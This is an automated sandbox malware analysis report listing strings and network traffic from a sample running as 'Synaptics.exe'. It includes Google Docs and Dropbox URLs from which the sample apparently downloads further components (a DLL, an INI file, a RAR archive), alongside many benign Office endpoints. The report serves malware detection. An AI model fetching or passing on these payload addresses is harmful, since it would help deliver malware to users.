                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://entitlement.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.ppe.windows.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.ppe.windows.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.windows.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.windows.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://incidents.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://invites.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://lifecycle.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.microsoftonline.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.local
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://management.azure.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://management.azure.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.engagement.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ncus.contentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ncus.pagecontentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officeapps.live.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com/embed?
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://osi.office.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://otelrules.azureedge.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/review/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerlift.acompli.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://roaming.edog.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://settings.outlook.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://shell.suite.office.com:1443
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://skyapi.live.net/Activity/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://staging.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://store.office.cn/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://store.office.de/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://tasks.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://web.microsoftstream.com/video/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://webshell.suite.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://wus2.contentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://wus2.pagecontentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://www.odwebp.svc.ms
                                Source: unknownDNS traffic detected: queries for: docs.google.com
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
